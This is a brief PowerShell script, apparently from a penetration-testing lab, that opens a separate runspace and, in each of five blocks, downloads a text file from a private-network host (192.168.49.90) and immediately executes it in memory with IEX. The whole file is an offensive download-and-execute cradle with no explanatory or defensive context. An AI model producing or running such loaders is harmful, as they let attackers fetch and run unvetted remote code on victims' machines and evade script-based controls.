$Runspace =[runspacefactory]::CreateRunspace()
$Runspace.Open()

$PowerShell = [powershell]::Create()
$PowerShell.runspace = $Runspace

$PowerShell.Commands.Clear()
$PowerShell.AddScript({(New-Object Net.Webclient).downloadstring("http://192.168.49.90/run1.txt")|IEX}).Invoke();

$PowerShell.Commands.Clear()
$PowerShell.AddScript({(New-Object Net.Webclient).downloadstring("http://192.168.49.90/run2.txt")|IEX}).Invoke();

$PowerShell.Commands.Clear()
$PowerShell.AddScript({(New-Object Net.Webclient).downloadstring("http://192.168.49.90/run3.txt")|IEX}).Invoke();

$PowerShell.Commands.Clear()
$PowerShell.AddScript({(New-Object Net.Webclient).downloadstring("http://192.168.49.90/run4.txt")|IEX}).Invoke();

$PowerShell.Commands.Clear()
$PowerShell.AddScript({(New-Object Net.Webclient).downloadstring("http://192.168.49.90/run5.txt")|IEX}).Invoke();